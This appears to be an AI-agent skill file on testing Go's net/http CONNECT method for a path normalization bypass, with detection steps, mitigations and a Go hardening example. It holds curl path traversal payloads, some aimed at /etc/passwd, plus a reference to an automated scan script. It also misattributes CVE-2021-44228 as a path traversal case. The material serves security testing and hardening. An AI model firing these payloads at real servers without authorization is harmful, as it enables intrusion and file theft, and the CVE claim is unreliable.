Hacktricks-skills golang-connect-vulnerability

Test for Go HTTP CONNECT method path normalization bypass vulnerabilities. Use this skill when analyzing Go web applications for path traversal issues, when investigating HTTP CONNECT method handling, or when security testing Go-based servers. This skill helps identify cases where the CONNECT method bypasses standard path normalization that other HTTP methods apply. Make sure to use this skill whenever you're testing Go web servers, investigating path traversal vulnerabilities, or analyzing HTTP method handling in Go applications.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/golang/SKILL.MD

GoLang HTTP CONNECT Method Vulnerability

Overview

Go's net/http library automatically normalizes request paths for most HTTP methods, but the CONNECT method is an exception. This can lead to path traversal vulnerabilities where protected resources become accessible through non-normalized paths.

How the Vulnerability Works

Normal Path Behavior

For standard HTTP methods (GET, POST, etc.), Go's HTTP server normalizes paths:

| Input Path | Normalized To |
|------------|---------------|
| /flag/     | /flag         |
| /../flag   | /flag         |
| /flag/.    | /flag         |

CONNECT Method Exception

The CONNECT method does not trigger path normalization. This means:

  • /../flag stays as /../flag
  • /flag/ stays as /flag/
  • /flag/. stays as /flag/.

This bypass can allow access to resources that would otherwise be protected.

Testing Methodology

Step 1: Identify Go-Based Servers

Look for indicators that a server is running Go:

# Check server headers
curl -I http://target.com | grep -i server

# Look for Go-specific headers or response patterns

Step 2: Test Path Normalization

Test if the server normalizes paths with standard methods:

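# Test with GET - should normalize
# (--path-as-is stops curl from collapsing the dot segments itself,
#  so the server is the one that sees and normalizes /../flag)
curl --path-as-is -X GET http://target.com/../flag
curl -X GET http://target.com/flag/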

# Test with CONNECT - may bypass normalization
curl --path-as-is -X CONNECT http://target.com/../flag

Step 3: Compare Responses

If the CONNECT method returns different content than GET, the vulnerability may be present:

# Save responses for comparison
# (--path-as-is on both requests so each one sends the same raw path)
curl --path-as-is -X GET http://target.com/../flag -o get_response.txt
curl --path-as-is -X CONNECT http://target.com/../flag -o connect_response.txt

# Compare
diff get_response.txt connect_response.txt

Common Test Patterns

Directory Traversal

# Test parent directory access
curl --path-as-is -X CONNECT http://target.com/../../../etc/passwd
curl --path-as-is -X CONNECT http://target.com/..%2f..%2f..%2fetc%2fpasswd

Trailing Slash Variations

# Test trailing slash bypass
curl --path-as-is -X CONNECT http://target.com/flag/
curl --path-as-is -X CONNECT http://target.com/flag/.

Mixed Path Variations

# Test various path encodings
curl --path-as-is -X CONNECT http://target.com/./../flag
curl --path-as-is -X CONNECT http://target.com/flag/./../secret

Automated Testing Script

Use the included test-connect-vuln.sh script for automated testing:

# Basic test
cd scripts
./test-connect-vuln.sh http://target.com

# Test specific paths
./test-connect-vuln.sh http://target.com --paths "/../flag" "/flag/" "/flag/."

# Verbose output
./test-connect-vuln.sh http://target.com --verbose

Mitigation Recommendations

For Developers

  1. Validate paths before processing - Don't rely on Go's automatic normalization
  2. Use a security library - Consider using libraries that handle path validation
  3. Implement custom CONNECT handling - Override default CONNECT behavior if needed
  4. Use reverse proxies - Configure nginx or similar to normalize paths before they reach Go

Example Fix Pattern

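import (
    "path"
    "strings"
)

// Validate and normalize paths manually
func validatePath(p string) string {
    // Clean the path; URL paths always use "/", so use path.Clean
    // rather than the OS-specific filepath.Clean
    cleanPath := path.Clean(p)

    // Ensure it doesn't escape intended directory
    // (match the ".." segment itself, not names that merely start with "..")
    if cleanPath == ".." || strings.HasPrefix(cleanPath, "../") {
        return "" // Reject
    }

    return cleanPath
}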
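
The CONNECT exception and the "validate paths before processing" recommendation, shown side by side in an added example (not code from this skill or from the Go project). The handler naive, the wrapper canonicalOnly, the helper status and the /flag route are constructed for illustration; requests are sent in-process with net/http/httptest, so nothing touches the network.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"path"
	"strings"
)

// naive (constructed) denies paths starting with "/flag" but resolves the
// resource from the cleaned path, trusting the mux to have normalized it.
func naive(w http.ResponseWriter, r *http.Request) {
	switch {
	case strings.HasPrefix(r.URL.Path, "/flag"):
		http.Error(w, "forbidden", http.StatusForbidden)
	case path.Clean(r.URL.Path) == "/flag":
		fmt.Fprint(w, "protected content")
	default:
		http.NotFound(w, r)
	}
}

// canonicalOnly refuses, for every method, a decoded path that is not rooted
// and already clean. Assumption: no subtree routes and no proxying, so
// trailing slashes and authority-form CONNECT (empty path) are refused too.
func canonicalOnly(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if p := r.URL.Path; !strings.HasPrefix(p, "/") || path.Clean(p) != p {
			http.Error(w, "bad path", http.StatusBadRequest)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// mux routes every path to naive through a catch-all "/" pattern.
var mux = http.NewServeMux()

func init() { mux.HandleFunc("/", naive) }

// status sends one in-process request and returns its status code.
func status(h http.Handler, method, target string) int {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(method, target, nil))
	return rec.Code
}

func main() {
	fmt.Println("mux alone:", status(mux, "GET", "/../flag"), status(mux, "CONNECT", "/../flag"))
	fmt.Println("hardened: ", status(canonicalOnly(mux), "CONNECT", "/../flag"))
}
```

With the mux alone, GET is answered with a redirect to the cleaned path while CONNECT reaches the handler with the raw path; wrapping the mux moves the check in front of routing so the method no longer matters.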

Safety Guidelines

⚠️ Important: Only test systems you have explicit authorization to test.

  • Get written permission before testing
  • Use this skill for educational purposes and authorized security assessments
  • Document findings responsibly
  • Report vulnerabilities through proper channels

References

Related Vulnerabilities

This vulnerability is related to:

  • Path traversal attacks (CVE-2021-44228 style)
  • HTTP method bypass vulnerabilities
  • Web server misconfiguration issues

Quick Reference

| Test               | Command                                                                                   |
|--------------------|-------------------------------------------------------------------------------------------|
| Basic CONNECT test | curl --path-as-is -X CONNECT http://target/../flag                                        |
| Compare with GET   | curl -X GET http://target/../flag vs curl --path-as-is -X CONNECT http://target/../flag   |
| Automated scan     | ./test-connect-vuln.sh http://target                                                      |
| Verbose output     | ./test-connect-vuln.sh http://target --verbose                                            |